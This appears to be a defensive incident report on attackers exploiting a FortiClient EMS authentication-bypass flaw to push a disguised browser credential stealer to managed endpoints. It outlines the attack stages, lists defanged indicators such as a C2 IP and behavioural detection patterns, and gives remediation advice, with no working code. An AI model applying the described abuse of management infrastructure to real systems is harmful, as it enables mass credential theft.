Full Report
Threat actors are continuing to exploit a critical, now-patched security flaw impacting FortiClient Endpoint Management Server (EMS) deployments to deliver credential-stealing malware. "The campaign abused trusted endpoint management infrastructure to deliver malware across managed endpoints," Arctic Wolf said. "Threat actors disguised the credential stealer payload as a Fortinet endpoint
Analysis Summary
# Incident Report: Exploitation of FortiClient EMS Flaw (CVE-2026-35616)
## Executive Summary
Threat actors exploited a critical vulnerability in FortiClient Endpoint Management Server (EMS) to distribute a custom credential-stealing malware. By bypassing API authentication, attackers weaponized trusted management infrastructure to push malicious PowerShell scripts to managed endpoints. The campaign resulted in the theft of browser-based credentials and session data, potentially enabling follow-on access to cloud and internal resources.
## Incident Details
- **Discovery Date:** May 2026
- **Incident Date:** May 2026
- **Affected Organization:** Not disclosed (multiple FortiClient EMS deployments)
- **Sector:** Various (Users of FortiClient EMS)
- **Geography:** Global
## Timeline of Events
### Initial Access
- **Date/Time:** May 2026
- **Vector:** Exploitation of CVE-2026-35616
- **Details:** Attackers exploited a critical pre-authentication API access bypass vulnerability (CVSS 9.1) in FortiClient EMS to gain unauthorized privileged access to the management console.
### Lateral Movement
- **Details:** Attackers did not need traditional lateral movement; instead, they "moved" by abusing the trusted EMS management pathway. By modifying Remote Access Profiles and endpoint policies, the actors pushed malicious commands directly from the central server to all managed endpoints simultaneously.
### Data Exfiltration/Impact
- **Details:** Managed endpoints executed a malicious payload disguised as `FortiEndpoint_Patch.exe`. This stealer harvested passwords, cookies, credit card details, and autofill data from Chromium and Gecko-based browsers. Data was exfiltrated via HTTP POST requests to an attacker-controlled IP.
### Detection & Response
- **Discovery:** Identified by Arctic Wolf researchers observing anomalous PowerShell execution patterns originating from the EMS infrastructure.
- **Response Actions:** Arctic Wolf and Fortinet released technical analyses; Fortinet released patches (v7.4.7+) to address the underlying API vulnerability.
## Attack Methodology
- **Initial Access:** Pre-authentication API access bypass (CVE-2026-35616).
- **Persistence:** Modification of Remote Access Profile configurations and endpoint policies within the EMS.
- **Privilege Escalation:** API bypass allowed acting in a privileged context without valid credentials.
- **Defense Evasion:** Used legitimate `fortitray.exe` to launch scripts; disguised payload as a legitimate update (`FortiEndpoint_Patch.exe`); deferred firmware upgrade reminders to avoid administrator intervention.
- **Credential Access:** Scraping Chromium/Gecko browser databases for cookies, passwords, and PII.
- **Discovery:** Leveraged EMS visibility to identify all managed endpoints.
- **Lateral Movement:** Abused internal management pathways ("Living off the Campus").
- **Collection:** Logged stolen data into local files in the `ProgramData` directory.
- **Exfiltration:** Base64-encoded PowerShell script sent logs to C2 via HTTP POST.
- **Impact:** Theft of session tokens and credentials to bypass MFA and access internal applications.
## Impact Assessment
- **Financial:** Potential for secondary fraud using stolen credit card data.
- **Data Breach:** High; widespread theft of browser-stored identity and financial information across managed endpoints.
- **Operational:** Minimal immediate disruption, but high long-term risk due to compromised credentials.
- **Reputational:** Loss of trust in endpoint management infrastructure.
## Indicators of Compromise (Defanged)
- **Network Indicators:**
- `83.138.53[.]110` (C2 IP)
- **File Indicators:**
- `FortiEndpoint_Patch.exe` (Infostealer executable)
- **Behavioral Indicators:**
- `fortitray.exe` spawning `cmd.exe` to execute Base64 PowerShell.
- Modification of EMS "Remote Access Profile" to include unexpected scripts.
- Silent execution of scripts via PowerShell on endpoints.
## Response Actions
- **Containment:** Isolation of affected EMS servers; blocking of the C2 IP at the perimeter.
- **Eradication:** Removal of malicious scripts from EMS policies; deletion of `FortiEndpoint_Patch.exe` and associated logs from `ProgramData`.
- **Recovery:** Updating FortiClient EMS to version 7.4.7 or later; rotating all browser-stored passwords and clearing session cookies.
## Lessons Learned
- **Trust as a Vector:** Trusted management tools are high-value targets because they provide a direct, "authorized" path to every device in the organization.
- **API Security:** Critical pre-auth vulnerabilities in management interfaces remain a primary entry point for sophisticated actors.
- **MFA Circumvention:** Stolen session cookies remain a primary method for attackers to bypass Multi-Factor Authentication.
## Recommendations
- **Patch Management:** Immediately upgrade FortiClient EMS to version 7.4.7 or higher.
- **Policy Monitoring:** Audit EMS policies and script deployments for unauthorized changes.
- **Zero Trust:** Implement "least privilege" for management servers and monitor their outbound traffic for unusual C2 communications.
- **Credential Hygiene:** Discourage the storage of highly sensitive passwords in browsers; prioritize the use of dedicated, enterprise-grade password managers.